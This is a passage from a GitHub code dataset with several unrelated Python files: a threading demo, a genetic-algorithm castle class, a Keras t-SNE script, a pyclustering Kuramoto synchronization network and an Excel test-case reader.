threads do nothing but generate data and store it in a shared variable\n# Consumer threads take data out of the shared variable and consume it\n# The shared variable is a global\n# A lock is required to keep the global variable consistent\nimport random\nimport threading\nimport time\ngCondition = threading.Condition()\ngMoney = 1000\ngTotalTime = 30 # fixed number of rounds\ngTime = 0\n\n\nclass ProducerThread(threading.Thread):\n    def run(self):\n        global gMoney\n        global gTime\n        while True:\n            money = random.randint(99,999) # random integer: the amount earned this round\n            gCondition.acquire() # lock before touching the globals\n            if gTime >= gTotalTime:\n                gCondition.release()\n                break\n            gMoney += money # update the global balance\n            print(\"%s produced %d yuan, balance is %d yuan\" %(threading.current_thread(),money,gMoney))\n\n            gTime += 1\n            gCondition.notify_all()# wake up every waiting thread\n            gCondition.release() # work done, release the lock\n            time.sleep(1)\n\nclass CustomerThread(threading.Thread):\n    def run(self):\n        global gMoney\n        while True: # loop forever\n            money = random.randint(99,999) # random amount to spend this round\n            gCondition.acquire() # lock\n            while gMoney < money:\n                # an if would run the statements below right after a single check;\n                # a while re-checks the condition every time the thread wakes up,\n                # which avoids spending after waiting only to find the balance still too low\n                if gTime >= gTotalTime:\n                    gCondition.release()# round limit exceeded\n                    return # return (instead of break) so the whole thread exits\n                print(\"%s wants to spend %d yuan, balance is %d yuan: insufficient funds\" % (threading.current_thread(), money, gMoney))\n                gCondition.wait() # balance too low: wait for a producer's notify_all\n            gMoney -= money\n            print(\"%s spent %d yuan, balance is %d yuan\" % (threading.current_thread(), money, gMoney))\n            gCondition.release()\n        
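    # sleep outside the lock so the producers and the other consumers can run\n        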
time.sleep(1)\n\n\ndef main():\n for x in range(3):\n t = ProducerThread()\n t.start()\n for x in range(3):\n t = CustomerThread()\n t.start()\n\nif __name__ == \"__main__\":\n main()","repo_name":"gaohj/python1902crawer","sub_path":"day6/threading_demo/demo6.py","file_name":"demo6.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24652753299","text":"class Person:\n \"\"\"\n class for storing information about a person\n\n Parameters:\n first_name (str): first name of the person\n last_name (str): last name of the person\n birth_year (int): year of birth of the person\n \"\"\"\n\n def __init__(self, first_name, last_name, birth_year):\n self.first_name = first_name\n self.last_name = last_name\n self.birth_year = birth_year\n\n","repo_name":"aninstan/skole","sub_path":"objektorientering/oppgave 3.py","file_name":"oppgave 3.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42706225777","text":"from selenium.webdriver.common.by import By\nfrom Testdata import test_data\nfrom Helper import test_logger\nfrom Helper import helpers\nimport random\n\n\naccessories_link = (By.XPATH, \"//a[@href='/accessories']\")\nwatches_link = (By.XPATH, \"//article/a[contains(@href, 'women-watches')]\")\naccount_favs = (By.XPATH, \"//a[@href='/account/favorites']\")\nfavs_numbers = (By.XPATH, \"//a[text()='Hearts']//following::span\")\nhearts_to_add_favs = (By.XPATH, \"//button[@data-test-id='heartButton']\")\n\n\ndef add_to_favorites():\n try:\n hearts = helpers.find_all(hearts_to_add_favs)\n for i in range(len(hearts)):\n random.choices(hearts, k=6)[i].click()\n test_logger.logger(\"Items are favoritized\")\n except Exception as e:\n test_logger.logger(e)\n","repo_name":"tatevgyurjyan/Automation-Frameworks","sub_path":"Automation_Framework_6pm/Pages/favorites.py","file_name":"favorites.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28404905183","text":"#!/usr/bin/env python3\n\nimport os, sys, pathlib, argparse\nfrom obt import docker, host, path\nimport obt.pathtools\nimport obt._globals\n\n##########################################\n# build dep dict\n##########################################\n\ndockermodules = docker.enumerate()\n\n##########################################\n\nimport obt.deco\ndeco = obt.deco.Deco()\n\n#print(dockermodules)\n\nline_index = 0\nfor key in dockermodules:\n\todd = line_index&1\n\tval = str(dockermodules[key]._module.info())\n\tif val!=\"???\":\n\t col_k = deco.rgbstr(255,255,0,key) if odd else deco.rgbstr(192,192,0,key)\n\t col_v = deco.rgbstr(255,255,255,val) if odd else deco.rgbstr(192,192,192,val)\n\t line = \"%27s\" % col_k\n\t line += \" \" + deco.magenta(\":\") + \" \"\n\t line += col_v\n\t print(line)\n\t line_index += 1\n","repo_name":"tweakoz/ork.build","sub_path":"bin_priv/obt.docker.list.py","file_name":"obt.docker.list.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"41975188688","text":"from castle_piece import Piece\nfrom random import randint, choice\n\n\nclass Castle:\n def __init__(self, pieces, all_pieces):\n self.selection_probability = None\n self.pieces = pieces\n self.total_cost = sum([piece.cost for piece in pieces])\n self.all_pieces = 
all_pieces\n        self.validate()\n\n    def __repr__(self):\n        rep = \"\"\n        for piece in self.pieces:\n            rep += f\"{piece}\\n\"\n        rep += f\"Total cost: {self.total_cost}\\n\"\n        return rep\n\n    def __gt__(self, other):\n        return self.fitness() > other.fitness()\n\n    def validate(self):\n        \"\"\"\n\n        make sure there is exactly one door and exactly one lookout\n\n        \"\"\"\n        door_count = list(filter(lambda p: p.type == \"door\", self.pieces))\n        lookout_count = list(filter(lambda p: p.type == \"lookout\", self.pieces))\n        if len(door_count) > 1:\n            while len(door_count) > 1:\n                to_remove = choice(door_count)\n                self.pieces.remove(to_remove)\n                door_count.remove(to_remove)\n        elif len(door_count) == 0:\n            self.pieces.append([p for p in self.all_pieces if p.type == \"door\"][0])\n        if len(lookout_count) > 1:\n            while len(lookout_count) > 1:\n                to_remove = choice(lookout_count)\n                self.pieces.remove(to_remove)\n                lookout_count.remove(to_remove)\n        elif len(lookout_count) == 0:\n            self.pieces.append([p for p in self.all_pieces if p.type == \"lookout\"][0])\n\n    def zero_fitness_condition(self):\n        max_height = self.pieces[0].strength\n        if len(self.pieces) > max_height:\n            return False\n        previous_piece = self.pieces[0]\n        for piece in self.pieces:\n            if piece.width > previous_piece.width:\n                return False\n            # advance the comparison point so widths must be non-increasing upward,\n            # not merely narrower than the bottom piece\n            previous_piece = piece\n        if self.pieces[0].type != \"door\" or self.pieces[-1].type != \"lookout\":\n            return False\n        return True\n\n    def fitness(self):\n        if self.zero_fitness_condition():\n            return 10 + (len(self.pieces) ** 2) - self.total_cost\n        else:\n            return 0\n\n    def mutate(self):\n        piece_A = choice(self.pieces)\n        piece_B = choice(self.pieces)\n        # look up both positions before assigning; writing piece_B first would\n        # make the second index() call find the slot that was just overwritten\n        index_A = self.pieces.index(piece_A)\n        index_B = self.pieces.index(piece_B)\n        self.pieces[index_A], self.pieces[index_B] = piece_B, piece_A\n\n    def set_selection_probability(self, selection_probability):\n        self.selection_probability = selection_probability\n\n    def crossover(self, other):\n        child_one = Castle(self.pieces.copy()[:len(self.pieces) // 2] + other.pieces.copy()[len(self.pieces) // 2:],\n                           self.all_pieces)\n        child_two = Castle(other.pieces.copy()[:len(other.pieces) // 2] + self.pieces.copy()[len(other.pieces) // 2:],\n                           self.all_pieces)\n        return child_one, child_two\n","repo_name":"kush5683/CS","sub_path":"4341/Assignment 2/castle.py","file_name":"castle.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21774523401","text":"# Initialize an empty dictionary: counts_dict of the counts of how many times each country appears in a column in the dataset\ncounts_dict = {}\n# Open a connection to the file\nwith open('world_dev_ind.csv') as file:\n\n    # Iterate over the generator from read_large_file()\n    for line in read_large_file(file):\n\n        row = line.split(',')\n        first_col = row[0]\n\n        if first_col in counts_dict.keys():\n            counts_dict[first_col] += 1\n        else:\n            counts_dict[first_col] = 1\n# Print \nprint(counts_dict)\n","repo_name":"Lina-Ennia/World-bank-data-Project","sub_path":"counts_country_in_a_column.py","file_name":"counts_country_in_a_column.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71013895146","text":"import os\nimport keras\nimport keras.backend as K\nimport numpy as np\nfrom tqdm import tqdm\n# cost_func is redefined below, so only the batch generator is imported here\nfrom datagen import TSNEBatchGenerator\n\ndef cost_func(y_true, y_pred):\n    x_batch = y_true\n    y_batch = y_pred\n\n    # batch_size = K.int_shape(x_batch)[0]\n    batch_size = 1 \n\n    x_batch = K.reshape(x_batch, (batch_size, -1))\n    y_batch = K.reshape(y_batch, 
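\n        # note: with batch_size hard-coded to 1 the pairwise matrices P and Q\n        # are 1x1, which makes the KL term identically zero; the loss is only\n        # meaningful for batch_size > 1, but here it is needed just to deserialize the model\n        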
(batch_size, -1))\n\n sigma = 784 / np.sqrt(2)\n\n rx = K.tf.reduce_sum( x_batch * x_batch, 1)\n rx = K.reshape(rx, (-1, 1))\n Gx = rx - 2 * K.tf.matmul(x_batch, K.tf.transpose(x_batch)) + K.tf.transpose(rx)\n x_numerator = K.exp( - Gx / (2 * np.square(sigma)))\n x_denominator = K.tf.reduce_sum(x_numerator)\n \n ry = K.tf.reduce_sum( y_batch * y_batch, 1)\n ry = K.reshape(ry, (-1, 1))\n Gy = ry - 2 * K.tf.matmul(y_batch, K.tf.transpose(y_batch)) + K.tf.transpose(ry)\n y_numerator = 1 / (1 + Gy)\n y_denominator = K.tf.reduce_sum(y_numerator)\n\n P = x_numerator / x_denominator\n Q = y_numerator / y_denominator\n\n KL = K.tf.reduce_sum(P * K.log(P / Q))\n return KL\n\nmodel = keras.models.load_model(\"./log/base1121/bestweights.hdf5\", custom_objects={\"cost_func\": cost_func})\nmodel.summary()\n\nbg = TSNEBatchGenerator(batch_size=1)\n\n\ny_latent = []\nfor i in tqdm(range(bg.num)):\n X, _ = bg.__getitem__(i)\n y = model.predict(X)[0]\n y_latent.append(y)\n \ny_latent = np.array(y_latent)\nnp.save( os.path.join(\"./log/base1121/\", \"y_latent.npy\"), y_latent)\n \n\n","repo_name":"yumaloop/keras-tSNE","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32431359052","text":"\"\"\"!\r\n\r\n@brief Neural Network: Oscillatory Neural Network based on Kuramoto model\r\n@details Based on article description:\r\n - A.Arenas, Y.Moreno, C.Zhou. Synchronization in complex networks. 2008.\r\n - X.B.Lu. Adaptive Cluster Synchronization in Coupled Phase Oscillators. 2009.\r\n - X.Lou. Adaptive Synchronizability of Coupled Oscillators With Switching. 2012.\r\n - A.Novikov, E.Benderskaya. Oscillatory Neural Networks Based on the Kuramoto Model. 2014.\r\n\r\n@authors Andrei Novikov (spb.andr@yandex.ru)\r\n@version 1.0\r\n@date 2014-2015\r\n@copyright GNU Public License\r\n\r\n@cond GNU_PUBLIC_LICENSE\r\n PyClustering is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n \r\n PyClustering is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n \r\n You should have received a copy of the GNU General Public License\r\n along with this program. 
If not, see .\r\n@endcond\r\n\r\n\"\"\"\r\n\r\n\r\nimport numpy;\r\nimport random;\r\n\r\nimport pyclustering.core.wrapper as wrapper;\r\n\r\nfrom scipy import pi;\r\nfrom scipy.integrate import odeint;\r\nfrom scipy.integrate import ode;\r\n\r\nfrom pyclustering.support import euclidean_distance;\r\n\r\nfrom pyclustering.nnet import *;\r\n\r\n\r\nclass sync_network(network, network_interface): \r\n \"\"\"!\r\n @brief Model of oscillatory network that is based on the Kuramoto model of synchronization.\r\n \r\n \"\"\"\r\n \r\n # Protected members:\r\n _name = 'Phase Sync Network'\r\n _phases = None; # Current phases of oscillators.\r\n _freq = None; # Own frequencies of oscillators.\r\n _weight = 0; # Strength of connections between oscillators.\r\n \r\n _ccore_network_pointer = None; # Pointer to CCORE Sync implementation of the network.\r\n \r\n # Properties of class that represents oscillatory neural network\r\n @property\r\n def phases(self):\r\n \"\"\"!\r\n @brief Returns list of phases of oscillators.\r\n \r\n @return (list) Phases of oscillators.\r\n \r\n \"\"\"\r\n \r\n return self._phases;\r\n\r\n\r\n def __init__(self, num_osc, weight = 1, frequency = 0, type_conn = conn_type.ALL_TO_ALL, conn_represent = conn_represent.MATRIX, initial_phases = initial_type.RANDOM_GAUSSIAN, ccore = False):\r\n \"\"\"!\r\n @brief Constructor of oscillatory network is based on Kuramoto model.\r\n \r\n @param[in] num_osc (uint): Number of oscillators in the network.\r\n @param[in] weight (double): Coupling strength of the links between oscillators.\r\n @param[in] frequency (double): Multiplier of internal frequency of the oscillators.\r\n @param[in] type_conn (conn_type): Type of connection between oscillators in the network (all-to-all, grid, bidirectional list, etc.).\r\n @param[in] conn_represent (conn_represent): Internal representation of connection in the network: matrix or list.\r\n @param[in] initial_phases (initial_type): Type of initialization of initial phases of oscillators (random, uniformly distributed, etc.).\r\n @param[in] ccore (bool): If True simulation is performed by CCORE library (C++ implementation of pyclustering).\r\n \r\n \"\"\"\r\n \r\n if (ccore is True):\r\n self._ccore_network_pointer = wrapper.create_sync_network(num_osc, weight, frequency, type_conn, initial_phases);\r\n else: \r\n super().__init__(num_osc, type_conn, conn_represent);\r\n \r\n self._weight = weight;\r\n \r\n self._phases = list();\r\n self._freq = list();\r\n \r\n for index in range(0, num_osc, 1): \r\n if (initial_phases == initial_type.RANDOM_GAUSSIAN):\r\n self._phases.append(random.random() * 2.0 * pi);\r\n elif (initial_phases == initial_type.EQUIPARTITION):\r\n self._phases.append( pi / num_osc * index);\r\n \r\n self._freq.append(random.random() * frequency);\r\n \r\n \r\n def __del__(self):\r\n \"\"\"!\r\n @brief Destructor of oscillatory network is based on Kuramoto model.\r\n \r\n \"\"\"\r\n \r\n if (self._ccore_network_pointer is not None):\r\n wrapper.destroy_sync_network(self._ccore_network_pointer);\r\n self._ccore_network_pointer = None;\r\n \r\n \r\n def sync_order(self):\r\n \"\"\"!\r\n @brief Calculates level of global synchorization in the network.\r\n \r\n @return (double) Level of global synchronization.\r\n \r\n @see sync_local_order()\r\n \r\n \"\"\"\r\n \r\n if (self._ccore_network_pointer is not None):\r\n return wrapper.sync_order(self._ccore_network_pointer);\r\n \r\n exp_amount = 0;\r\n average_phase = 0;\r\n \r\n for index in range(0, self.num_osc, 1):\r\n exp_amount += 
numpy.exp(1j * self._phases[index]);\r\n        \r\n        exp_amount /= self.num_osc;\r\n        \r\n        # Kuramoto order parameter: the modulus of the mean phasor, which tends to 1.0\r\n        # as the oscillators synchronize and to 0.0 for uniformly scattered phases.\r\n        return abs(exp_amount);\r\n    \r\n    \r\n    def sync_local_order(self):\r\n        \"\"\"!\r\n        @brief Calculates level of local (partial) synchronization in the network.\r\n        \r\n        @return (double) Level of local (partial) synchronization.\r\n        \r\n        @see sync_order()\r\n        \r\n        \"\"\"\r\n        \r\n        if (self._ccore_network_pointer is not None):\r\n            return wrapper.sync_local_order(self._ccore_network_pointer);\r\n        \r\n        exp_amount = 0;\r\n        num_neigh = 0;\r\n        \r\n        for i in range(0, self.num_osc, 1):\r\n            for j in range(0, self.num_osc, 1):\r\n                if (self.has_connection(i, j) == True):\r\n                    exp_amount += numpy.exp(-abs(self._phases[j] - self._phases[i]));\r\n                    num_neigh += 1;\r\n        \r\n        if (num_neigh == 0):\r\n            num_neigh = 1;\r\n        \r\n        return exp_amount / num_neigh;\r\n    \r\n    \r\n    def _phase_kuramoto(self, teta, t, argv):\r\n        \"\"\"!\r\n        @brief Returns result of phase calculation for specified oscillator in the network.\r\n        \r\n        @param[in] teta (double): Phase of the oscillator that is differentiated.\r\n        @param[in] t (double): Current time of simulation.\r\n        @param[in] argv (tuple): Index of the oscillator in the list.\r\n        \r\n        @return (double) New phase for specified oscillator (don't assign here).\r\n        \r\n        \"\"\"\r\n        \r\n        index = argv;\r\n        phase = 0;\r\n        for k in range(0, self.num_osc):\r\n            if (self.has_connection(index, k) == True):\r\n                phase += numpy.sin(self._phases[k] - teta);\r\n            \r\n        return ( self._freq[index] + (phase * self._weight / self.num_osc) );\r\n    \r\n    \r\n    def allocate_sync_ensembles(self, tolerance = 0.01):\r\n        \"\"\"!\r\n        @brief Allocate clusters in line with ensembles of synchronous oscillators where each\r\n               synchronous ensemble corresponds to only one cluster.\r\n        \r\n        @param[in] tolerance (double): Maximum error for allocation of synchronous ensemble oscillators.\r\n        \r\n        @return (list) Groups (lists) of indexes of synchronous oscillators.\r\n                For example [ [index_osc1, index_osc3], [index_osc2], [index_osc4, index_osc5] ].\r\n        \r\n        \"\"\"\r\n        \r\n        if (self._ccore_network_pointer is not None):\r\n            return wrapper.allocate_sync_ensembles_sync_network(self._ccore_network_pointer, tolerance);\r\n        \r\n        clusters = [];\r\n        if (self._num_osc > 0):\r\n            clusters.append([0]);\r\n        \r\n        for i in range(1, self._num_osc, 1):\r\n            cluster_allocated = False;\r\n            for cluster in clusters:\r\n                for neuron_index in cluster:\r\n                    if ( (self._phases[i] < (self._phases[neuron_index] + tolerance)) and (self._phases[i] > (self._phases[neuron_index] - tolerance)) ):\r\n                        cluster_allocated = True;\r\n                        cluster.append(i);\r\n                        break;\r\n                \r\n                if (cluster_allocated == True):\r\n                    break;\r\n            \r\n            if (cluster_allocated == False):\r\n                clusters.append([i]);\r\n        \r\n        return clusters;\r\n    \r\n    \r\n    def simulate(self, steps, time, solution = solve_type.FAST, collect_dynamic = True):\r\n        \"\"\"!\r\n        @brief Performs static simulation of Sync oscillatory network.\r\n        \r\n        @param[in] steps (uint): Number steps of simulations during simulation.\r\n        @param[in] time (double): Time of simulation.\r\n        @param[in] solution (solve_type): Type of solution (solving).\r\n        @param[in] collect_dynamic (bool): If True - returns whole dynamic of oscillatory network, otherwise returns only last values of dynamics.\r\n        \r\n        @return (list) Dynamic of oscillatory network. 
If argument 'collect_dynamic' = True, than return dynamic for the whole simulation time,\r\n otherwise returns only last values (last step of simulation) of dynamic.\r\n \r\n @see simulate_dynamic()\r\n @see simulate_static()\r\n \r\n \"\"\"\r\n \r\n return self.simulate_static(steps, time, solution, collect_dynamic);\r\n\r\n\r\n def simulate_dynamic(self, order = 0.998, solution = solve_type.FAST, collect_dynamic = False, step = 0.1, int_step = 0.01, threshold_changes = 0.0000001):\r\n \"\"\"!\r\n @brief Performs dynamic simulation of the network until stop condition is not reached. Stop condition is defined by input argument 'order'.\r\n \r\n @param[in] order (double): Order of process synchronization, destributed 0..1.\r\n @param[in] solution (solve_type): Type of solution.\r\n @param[in] collect_dynamic (bool): If True - returns whole dynamic of oscillatory network, otherwise returns only last values of dynamics.\r\n @param[in] step (double): Time step of one iteration of simulation.\r\n @param[in] int_step (double): Integration step, should be less than step.\r\n @param[in] threshold_changes (double): Additional stop condition that helps prevent infinite simulation, defines limit of changes of oscillators between current and previous steps.\r\n \r\n @return (list) Dynamic of oscillatory network. If argument 'collect_dynamic' = True, than return dynamic for the whole simulation time,\r\n otherwise returns only last values (last step of simulation) of dynamic.\r\n \r\n @see simulate()\r\n @see simulate_static()\r\n \r\n \"\"\"\r\n \r\n if (self._ccore_network_pointer is not None):\r\n return wrapper.simulate_dynamic_sync_network(self._ccore_network_pointer, order, solution, collect_dynamic, step, int_step, threshold_changes);\r\n \r\n # For statistics and integration\r\n time_counter = 0;\r\n \r\n # Prevent infinite loop. 
It's possible when required state cannot be reached.\r\n previous_order = 0;\r\n current_order = self.sync_local_order();\r\n \r\n # If requested input dynamics\r\n dyn_phase = [];\r\n dyn_time = [];\r\n if (collect_dynamic == True):\r\n dyn_phase.append(self._phases);\r\n dyn_time.append(0);\r\n \r\n # Execute until sync state will be reached\r\n while (current_order < order): \r\n # update states of oscillators\r\n self._phases = self._calculate_phases(solution, time_counter, step, int_step);\r\n \r\n # update time\r\n time_counter += step;\r\n \r\n # if requested input dynamic\r\n if (collect_dynamic == True):\r\n dyn_phase.append(self._phases);\r\n dyn_time.append(time_counter);\r\n else:\r\n dyn_phase = self._phases;\r\n dyn_time = time_counter;\r\n \r\n # update orders\r\n previous_order = current_order;\r\n current_order = self.sync_local_order();\r\n \r\n # hang prevention\r\n if (abs(current_order - previous_order) < threshold_changes):\r\n print(\"Warning: sync_network::simulate_dynamic - simulation is aborted due to low level of convergence rate (order = \" + str(current_order) + \").\");\r\n break;\r\n \r\n return (dyn_time, dyn_phase);\r\n\r\n\r\n def simulate_static(self, steps, time, solution = solve_type.FAST, collect_dynamic = False):\r\n \"\"\"!\r\n @brief Performs static simulation of oscillatory network.\r\n \r\n @param[in] steps (uint): Number steps of simulations during simulation.\r\n @param[in] time (double): Time of simulation.\r\n @param[in] solution (solve_type): Type of solution.\r\n @param[in] collect_dynamic (bool): If True - returns whole dynamic of oscillatory network, otherwise returns only last values of dynamics.\r\n \r\n @return (list) Dynamic of oscillatory network. If argument 'collect_dynamic' = True, than return dynamic for the whole simulation time,\r\n otherwise returns only last values (last step of simulation) of dynamic.\r\n \r\n @see simulate()\r\n @see simulate_dynamic()\r\n \r\n \"\"\"\r\n \r\n if (self._ccore_network_pointer is not None):\r\n return wrapper.simulate_sync_network(self._ccore_network_pointer, steps, time, solution, collect_dynamic);\r\n \r\n dyn_phase = None;\r\n dyn_time = None;\r\n \r\n if (collect_dynamic == True):\r\n dyn_phase = [];\r\n dyn_time = [];\r\n \r\n dyn_phase.append(self._phases);\r\n dyn_time.append(0);\r\n \r\n step = time / steps;\r\n int_step = step / 10.0;\r\n \r\n for t in numpy.arange(step, time + step, step):\r\n # update states of oscillators\r\n self._phases = self._calculate_phases(solution, t, step, int_step);\r\n \r\n # update states of oscillators\r\n if (collect_dynamic == True):\r\n dyn_phase.append(self._phases);\r\n dyn_time.append(t);\r\n else:\r\n dyn_phase = self._phases;\r\n dyn_time = t;\r\n \r\n return (dyn_time, dyn_phase); \r\n\r\n\r\n def _calculate_phases(self, solution, t, step, int_step):\r\n \"\"\"!\r\n @brief Calculates new phases for oscillators in the network in line with current step.\r\n \r\n @param[in] solution (solve_type): Type solver of the differential equation.\r\n @param[in] t (double): Time of simulation.\r\n @param[in] step (double): Step of solution at the end of which states of oscillators should be calculated.\r\n @param[in] int_step (double): Step differentiation that is used for solving differential equation.\r\n \r\n @return (list) New states (phases) for oscillators.\r\n \r\n \"\"\"\r\n \r\n next_phases = [0] * self.num_osc; # new oscillator _phases\r\n \r\n for index in range (0, self.num_osc, 1):\r\n if (solution == solve_type.FAST):\r\n result = 
self._phases[index] + self._phase_kuramoto(self._phases[index], 0, index);\r\n                next_phases[index] = self._phase_normalization(result);\r\n                \r\n            elif (solution == solve_type.RK4):\r\n                result = odeint(self._phase_kuramoto, self._phases[index], numpy.arange(t - step, t, int_step), (index , ));\r\n                next_phases[index] = self._phase_normalization(result[len(result) - 1][0]);\r\n                \r\n            else:\r\n                raise NameError(\"Solver '\" + str(solution) + \"' is not supported\");\r\n        \r\n        return next_phases;\r\n    \r\n\r\n    def _phase_normalization(self, teta):\r\n        \"\"\"!\r\n        @brief Normalization of phase of oscillator that should be placed between [0; 2 * pi].\r\n        \r\n        @param[in] teta (double): phase of oscillator.\r\n        \r\n        @return (double) Normalized phase.\r\n        \r\n        \"\"\"\r\n        \r\n        norm_teta = teta;\r\n        while (norm_teta > (2.0 * pi)) or (norm_teta < 0):\r\n            if (norm_teta > (2.0 * pi)):\r\n                norm_teta -= 2.0 * pi;\r\n            else:\r\n                norm_teta += 2.0 * pi;\r\n        \r\n        return norm_teta;\r\n","repo_name":"Khoirotunnisa07/pyclustering","sub_path":"pyclustering/nnet/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":16916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"33607892483","text":"IK = 'IK'\nCHUY = 'CH'\nNARYN = 'NR'\nTALAS = 'TS'\nOSH = 'OS'\nJALAL = 'JL'\nBATKEN = 'BT'\n\nOBLAST_CHOICES = (\n    (IK, 'Иссык-Кульская область'),\n    (CHUY, 'Чуйская область'),\n    (NARYN, 'Нарынская область'),\n    (TALAS, 'Таласская область'),\n    (OSH, 'Ошская область'),\n    (JALAL, 'Джалал-Абадская область'),\n    (BATKEN, 'Баткенская область'),\n)\n","repo_name":"edzen12/min_crm","sub_path":"backend/crm/apps/branches/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69977566187","text":"import os\nimport json\nimport openpyxl\nfrom filelock import FileLock\nfrom common.constant import Constant\nfrom common.logger import logger\n\nif not os.path.exists(Constant.EXCEL_DIR):\n    os.mkdir(Constant.EXCEL_DIR)\n\n\nclass CasesData:\n\n    def __init__(self, attrs):\n        for t in attrs:\n            try:\n                setattr(self, t[0], t[1])\n            except TypeError:\n                continue\n\n    def __str__(self):\n        return getattr(self, \"title\", super().__str__())\n\n    def __repr__(self):\n        return getattr(self, \"title\", super().__repr__())\n\n    def __setattr__(self, key, value):\n        try:\n            value = json.loads(value)\n        except (json.decoder.JSONDecodeError, TypeError):\n            try:\n                if \"[\" in value and \"]\" in value:\n                    value = eval(value)\n            except (SyntaxError, TypeError):\n                pass\n        finally:\n            super().__setattr__(key, value)\n\n\nclass ReadExcel:\n\n    def __init__(self, file_path, *sheet_name):\n        \"\"\"\n\n        :param file_path: path of the excel workbook -> str\n        :param sheet_name: name(s) of the worksheets to read -> str\n        \"\"\"\n        self.file_path = file_path\n        self.sheet_name = sheet_name\n        self.wb = None\n        self.sheet = dict()\n        self.data = dict()\n\n    def __open(self):\n        # create the openpyxl workbook object (guarded by a file lock)\n        with FileLock(self.file_path + \".lock\", timeout=30):\n            self.wb = openpyxl.load_workbook(self.file_path)\n            for sheet in self.sheet_name:\n                try:\n                    self.sheet.setdefault(sheet, self.wb[sheet])\n                except KeyError as e:\n                    logger.error(f\"The sheet: [{sheet}] does not exist. 
Track:{e}\")\n raise e\n self.wb.close()\n logger.info(\"Workbook: {}, Sheet: {}\".format(self.file_path, self.sheet_name))\n\n def read_obj(self):\n self.__open()\n for k, y in self.sheet.items():\n data = self._read_excel_obj(y)\n self.data.setdefault(k, data)\n return self.data\n\n def read_dict(self):\n self.__open()\n data = dict()\n for k, y in self.sheet.items():\n dic = self._read_excel_dict(y)\n data.setdefault(k, dic)\n return data\n\n @staticmethod\n def _read_excel_dict(sheet) -> list:\n \"\"\"\n 方法一: 将每条数据以dict的形式储存于list中\n :param sheet:\n :return: 以列表形式存储的case_data -> list\n \"\"\"\n # 获取首行数据,得到title并存于list\n title = []\n for i in sheet[1]:\n title.append(i.value)\n # 获取每一行的数据并与title组成dict\n case_data = []\n if sheet.max_row >= 3:\n for r in sheet[2:sheet.max_row]:\n case_list = []\n for va in r:\n case_list.append(va.value)\n case_data.append(zip(title, case_list))\n else:\n data = [i.value for i in sheet[2:sheet.max_row]]\n case_data.append(zip(title, data))\n return case_data\n\n @staticmethod\n def _read_excel_obj(sheet_obj, *list_column) -> list:\n \"\"\"\n 自定义选择需要读取的column, 若未传则默认返回全部\n :param sheet_obj:\n :param list_column: 不定长参数, 需要读取的column(int) -> tuple\n :return: list中存着对象,对象中有实例属性 -> list\n \"\"\"\n title = []\n if not list_column: # 未传参时默认为获取全部\n for i in sheet_obj[1]:\n title.append(i.value)\n obj_data = []\n if sheet_obj.max_row >= 3:\n for r in sheet_obj[2:sheet_obj.max_row]:\n case_list = []\n for va in r:\n case_list.append(va.value)\n attr = CasesData(zip(title, case_list))\n if getattr(attr, \"id\", None):\n obj_data.append(attr)\n else:\n logger.warning(f\"Invalid data exists in sheet:[{sheet_obj.title}],\"\n f\"The value of coordinate:[{r[0].coordinate}] is value:[{r[0].value}] \")\n else:\n data = [i.value for i in sheet_obj[2:sheet_obj.max_row]]\n attr = CasesData(zip(title, data))\n if getattr(attr, \"id\", None):\n obj_data.append(attr)\n\n else: # 指定column\n if sheet_obj.max_column < max(list_column):\n raise ValueError(\"Column out of range\")\n data = list(sheet_obj.rows)\n for c in list_column:\n title.append(data[0][c - 1].value)\n obj_data = []\n for i in data[1:]:\n case_list = []\n for y in list_column:\n x = y - 1\n case_list.append(i[x].value)\n attr = CasesData(zip(title, case_list))\n obj_data.append(attr)\n return obj_data\n\n def write_data(self, sheet, *args) -> None:\n \"\"\"\n 写入excel\n :param sheet:\n :param args: 支持单个/多个单元格写入 Example: [{\"row\": int, \"column\": int, \"msg\": data}, ]\n :return:\n \"\"\"\n\n def write(sheet, **kwargs):\n row = kwargs['row']\n column = kwargs['column']\n msg = kwargs['msg']\n try:\n logger.info(\"Excel write to data! 
